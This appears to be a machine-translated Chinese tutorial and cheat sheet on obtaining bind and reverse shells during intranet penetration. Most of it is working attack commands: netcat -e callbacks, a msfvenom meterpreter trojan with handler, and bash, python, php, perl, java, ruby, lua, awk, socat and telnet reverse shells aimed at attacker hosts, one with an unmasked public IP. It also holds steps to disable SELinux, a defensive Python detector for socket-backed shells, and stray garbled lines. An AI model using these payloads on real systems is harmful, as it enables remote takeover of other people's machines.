Shulou (Shulou.com) 05/31 report, SLTechnology News&Howtos > Network Security, updated 2025-01-28
This article explains in detail, with worked examples, how a shell is bounced (reverse shell) in intranet penetration. The editor thinks it is very practical and shares it for reference; I hope you gain something from reading it.
Disclaimer: the techniques in this article are only for use by network security technicians and white hats and must not be used by any individual or organization for any other purpose.
Any crime discovered will be reported directly to the state security organs for handling.
Reverse shell
Bounce shell (reverse shell): obtaining the command line of the victim's machine on the attacker's machine.
Background:
Gain a deeper understanding of the intranet and its organizational structure in order to carry out intranet penetration more effectively.
Forward shell (bind shell)
Purpose:
Use nc to connect forward to a shell listening on the target server and obtain control of the target server (DMZ large target range).
Premise:
The attacker can access (connect to) the open port on the target web server, and the web server's firewall does not block the attacker's inbound traffic. This applies when the controlled machine has an open port that can be reached.
Experimental environment:
Physical machine (attack machine):
Target server (public network Windows): *.**.88.201:6666
Network Topology:
The steps of the experiment:
Step 1:
Connect actively to the controlled host's shell: use nc to listen on port 6666 on the controlled host. Once the shell is bounced successfully you control the target server's cmd.exe program (as long as something connects to port 6666 of the target server, cmd.exe is executed). The result is shown below:
Command:
# If the controlled host is Windows, use:
nc.exe -lvp 4444 -e cmd.exe
# If the controlled host is Linux, use:
nc -lvp 4444 -e /bin/bash
The following picture shows the controlled host:
Step 2:
The attack machine connects to port 6666 of the target server; the result is shown below:
Command:
# Attacker:
# nc -vv CONTROLLED_SERVER_IP 4444
nc -vv *.**.88.201 6666
The following figure shows the attacker host:
Reverse shell
Purpose:
Use nc to bounce a shell back to the attacker's local machine and gain control of the target server (DMZ large target range).
Premise:
1. The firewall allows outbound traffic from the web server (the controlled host).
2. The attacker must have a public network IP.
Experimental environment:
Attack machine (public network kali): *.*.23.106:9999
Controlled machine (public network windows):
Network Topology:
The steps of the experiment:
Step 1:
The attacker's public network VPS listens on port 9999:
The attacker's kali (public network IP) listens on local port 9999, and the controlled host bounces its shell to port 9999 of kali. The result is as follows:
Command:
# Attack machine (public network kali): **.**.23.106:9999
nc -lvvp 9999
The following figure shows the public network kali:
Step 2:
Bounce the controlled host's shell to port 9999 of the attacker's kali, as shown in the following figure:
Command:
# Bounce a Linux shell:
nc -e /bin/bash ATTACKER_PUBLIC_IP 9999
# Bounce a Windows shell:
nc -e cmd.exe ATTACKER_PUBLIC_IP 9999
The following picture shows the controlled host:
Step 3:
On kali, check that the target server's shell has bounced back successfully, as shown in the following figure:
Analysis:
For the bounce to succeed, the attacker must open the listening port on the public network kali, and the firewall must allow the traffic through port 9999.
The attacker must have a public network IP, and the controlled host's outbound traffic must be able to reach it.
Other ways to bounce a shell:
msf bounce: experimental environment:
Attack machine (public network kali): *.*.23.106:9999
Controlled host (virtual machine win8):
The steps of the experiment:
Step 1:
The attacker's public network VPS listens on port 9999:
The attacker uses msfconsole from msf on the public network kali (public network IP) to listen on port 9999 for the Trojan's call-back. The result is as follows:
Command:
# Attack machine (public network kali): *.23.106:9999
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost *.23.106
set lport 9999
Step 2:
Generate a call-back Trojan, upload it to the controlled host (virtual machine win8), and run it so that the controlled host bounces its shell to port 9999 of kali (public network IP), as shown below:
Command:
# Generate the call-back Trojan with msfvenom:
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=***.***.23.106 lport=9999 -f exe -o test.exe
# finalshell is used here to connect to the public network kali remotely, so use the sz command to download the generated Trojan to the physical machine:
sz test.exe
# Then put the downloaded Trojan file onto the controlled host (virtual machine win8).
Step 3:
On the controlled host (virtual machine win8), click to run test.exe (this Trojan file), and view the public network kali rebound, as shown below:
Bash bounce: experimental environment:
Attack machine (public network kali): *.*.23.106:9999
Controlled machine (virtual machine centos6.5):
Experimental steps:
Receiver (attacker IP, public network): nc -lvvp PORT
Sender (controlled host): bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1
Sender (controlled host): 0room31
Step 1:
To keep the environment close to real combat, leave the firewall on. (Shell bouncing comes in forward and reverse forms; 90% of the time we use the reverse form.)
Under normal circumstances the attacker cannot connect forward to the target server; apart from the open port 22 it could connect through ssh, but we do not know the ssh account password. Our main purpose is to obtain a reverse shell from the target host, so the firewall cannot be turned off. Just turn off SELinux with setenforce and check the firewall status, as shown in the following figure:
Command:
# Turn off SELinux:
setenforce 0
# View the firewall status:
service iptables status
Step 2:
The attacker's public network VPS listens on port 9999:
The attacker's kali (public network IP) listens on local port 9999, and the controlled host bounces its shell to port 9999 of kali. The result is as follows:
Command:
# Attack machine (public network kali): **.**.23.106:9999
nc -lvvp 9999
Command:
bash -i >& /dev/tcp/***.***.23.106/9999 0>&1
Step 3:
On the controlled machine (virtual machine centos6.5), use bash to bounce the shell to the attacker's public network kali, then check the bounce on kali, as shown below:
Python bounce: experimental environment:
Attack machine (public network kali): *.*.23.106:9999
Controlled machine (virtual machine centos6.5):
Experimental steps:
Receiver (attacker IP, public network): nc -lvvp PORT
Sender (controlled host): python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_PUBLIC_IP",ATTACKER_LISTENING_PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
Step 1:
The attacker's public network VPS listens on port 9999:
The attacker's kali (public network IP) listens on local port 9999, and the controlled host bounces its shell to port 9999 of kali. The result is as follows:
Command:
# Attack machine (public network kali): **.**.23.106:9999
nc -lvvp 9999
Step 2:
On the controlled machine (virtual machine centos6.5), use python to bounce the shell to the attacker's public network kali, then check the bounce on kali, as shown below:
Command:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("*.**.23.106",9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
PHP bounce: experimental environment:
Attack machine (public network kali): *.*.23.106:9999
Controlled machine (virtual machine centos6.5):
Experimental steps:
Receiver (attacker IP, public network): nc -lvvp PORT
Sender (controlled host): bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1
Sender (controlled host): php -r '$sock=fsockopen("ATTACKER_IP",PORT);exec("/bin/sh -i <&3 >&3 2>&3");'
Step 1:
The attacker's public network VPS listens on port 9999:
The attacker's kali (public network IP) listens on local port 9999, and the controlled host bounces its shell to port 9999 of kali:
Command:
# Attack machine (public network kali): **.**.23.106:9999
nc -lvvp 9999
Step 2:
On the controlled machine (virtual machine centos6.5), use php to bounce the shell to the attacker's public network kali, then check the bounce on kali:
Command:
php -r '$sock=fsockopen("**.**.23.106",9999);exec("/bin/bash -i <&3 >&3 2>&3");'
Perl bounce: experimental environment:
Attack machine (public network kali): *.*.23.106:9999
Controlled machine (virtual machine centos6.5):
Experimental steps:
Receiver (attacker IP, public network): nc -lvvp PORT
Sender: perl -e 'use Socket;$i="ATTACKER_IP";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
Step 1:
The attacker's public network VPS listens on port 9999:
The attacker's kali (public network IP) listens on local port 9999, and the controlled host bounces its shell to port 9999 of kali. The result is as follows:
Command:
# Attack machine (public network kali): **.**.23.106:9999
nc -lvvp 9999
Step 2:
On the controlled machine (virtual machine centos6.5), use perl to bounce the shell to the attacker's public network kali, then check the bounce on kali, as shown below:
Command:
perl -e 'use Socket;$i="**.*.23.106";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
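Every variant above (bash's /dev/tcp redirection, python's os.dup2, perl's open(STDIN,">&S"), php's fsockopen) ends in the same state: a shell whose descriptors 0, 1 and 2 are a TCP socket instead of a terminal, which is visible on the controlled host under /proc. The Python below is an added detection example for that state, not code from the original article: it walks a /proc-style tree and reports shell-like processes whose fds 0-2 all link to a socket. The tree built by build_sample_proc() is constructed for the demonstration; on a live host call find_socket_backed_shells() with the default root.

```python
import os
import tempfile

# Interpreters/shells whose stdin, stdout and stderr are normally a tty or a pipe, never a socket.
SHELLS = {"bash", "sh", "dash", "zsh", "ksh", "python", "python3", "perl", "php"}


def fd_targets(proc_root, pid):
    """Return {fd: link target} for one process, e.g. {0: 'socket:[31337]', 1: '/dev/pts/0'}."""
    fd_dir = os.path.join(proc_root, str(pid), "fd")
    targets = {}
    for name in os.listdir(fd_dir):
        try:
            targets[int(name)] = os.readlink(os.path.join(fd_dir, name))
        except OSError:
            continue  # descriptor closed while we were looking
    return targets


def find_socket_backed_shells(proc_root="/proc"):
    """Return [(pid, program, argv)] for shell-like processes whose fds 0, 1 and 2 all point at a socket."""
    hits = []
    for entry in sorted(os.listdir(proc_root)):
        if not entry.isdigit():
            continue
        try:
            with open(os.path.join(proc_root, entry, "cmdline"), "rb") as f:
                argv = [a.decode(errors="replace") for a in f.read().split(b"\0") if a]
            fds = fd_targets(proc_root, entry)
        except OSError:
            continue  # process exited, or we lack permission to inspect it
        program = os.path.basename(argv[0]) if argv else ""
        if program in SHELLS and all(fds.get(i, "").startswith("socket:") for i in (0, 1, 2)):
            hits.append((int(entry), program, argv))
    return hits


def build_sample_proc():
    """Constructed sample /proc tree (not a real system): one socket-backed bash, one bash on a pty."""
    root = tempfile.mkdtemp()
    for pid, argv, links in (
        (4242, ["/bin/bash", "-i"], {0: "socket:[31337]", 1: "socket:[31337]", 2: "socket:[31337]"}),
        (5151, ["/bin/bash"], {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}),
    ):
        os.makedirs(os.path.join(root, str(pid), "fd"))
        with open(os.path.join(root, str(pid), "cmdline"), "wb") as f:
            f.write(b"\0".join(a.encode() for a in argv) + b"\0")
        for fd, target in links.items():
            os.symlink(target, os.path.join(root, str(pid), "fd", str(fd)))
    return root
```

The same check also catches the python and perl variants, because the /bin/bash they exec inherits the socket-backed descriptors.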
Linux bounce shell pose collection:
When bouncing a shell on the target server (Linux), first check whether the required program is installed on the target server with a command like the following:
Command:
# For example, check whether php is installed on the target server:
rpm -q php
Linux bounce shell summary
1.1 Send a file (public network to intranet)
File sender: nc -lp 6666 < file
File receiver: nc SENDER_IP SENDER_PORT > newfile
1.2 Send a file (intranet to public network)
File sender: nc -lp 6666 > file
File receiver: nc SENDER_IP SENDER_PORT < newfile
2. Chat
Sender: nc -lp 6666
Receiver: nc SENDER_IP SENDER_PORT
3.1 Send a shell (bind shell)
Sender (public network server): nc -lvvp 6666 -e /bin/bash
Receiver: nc SENDER_IP SENDER_PORT
3.2 Reverse shell
Receiver: nc -lvvp 6666
Sender (intranet server): nc RECEIVER_IP RECEIVER_PORT -e /bin/bash
4. bash bounce
Receiver (hacker IP, public network): nc -lvvp PORT
Sender (victim): bash -i >& /dev/tcp/111.230.170.95/9985 0>&1
Sender (victim): 0room31
5.1 socat bounce (tcp)
Receiver (attack machine): ./socat TCP-LISTEN:PORT -
Sender (target machine): ./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ATTACK_MACHINE_IP:ATTACK_MACHINE_PORT
5.2 socat bounce (udp)
Receiver: nc -lvvp 8080
Sender: socat udp-connect:ATTACKER_IP:PORT exec:'bash -li',pty,stderr,sane 2>&1 >/dev/null &
6. python bounce
Receiver (attack machine, public network): nc -lvvp PORT
Sender (target machine): python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("RECEIVER_IP",RECEIVER_PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
7. PHP bounce
Receiver: nc -lvvp PORT
Sender: php -r '$sock=fsockopen("ATTACKER_IP",PORT);exec("/bin/sh -i <&3 >&3 2>&3");'
8. Java bounce
Receiver: nc -lvvp PORT
Sender:
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKER_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
9. Perl bounce
Receiver: nc -lvvp PORT
Sender: perl -e 'use Socket;$i="ATTACKER_IP";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
10. Ruby bounce
Receiver: nc -lvvp PORT
Sender: ruby -rsocket -e 'exit if fork;c=TCPSocket.new("ATTACKER_IP","PORT");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
11. telnet bounce
Receiver: nc -lvvp PORT
Sender: mknod backpipe p && telnet ATTACKER_IP PORT 0<backpipe | /bin/bash 1>backpipe
12. lua bounce (install the lua environment: apt-get install lua*)
Receiver: nc -lvvp PORT
Sender: lua -e "local s=require('socket');local t=assert(s.tcp());t:connect('ATTACKER_IP',PORT);while true do local r,x=t:receive();local f=assert(io.popen(r,'r'));local b=assert(f:read('*a'));t:send(b);end;f:close();t:close()"
13. awk bounce
Receiver: nc -lvvp PORT
Sender: awk 'BEGIN{s="/inet/tcp/0/ATTACKER_IP/PORT";while(1){do{s|&getline c;if(c){while((c|&getline)>0)print $0|&s;close(c)}}while(c!="exit");close(s)}}'
14. ksh bounce
Receiver: nc -lvvp PORT
Sender: ksh -c 'ksh >/dev/tcp/ATTACKER_IP/PORT 2>&1 <&1'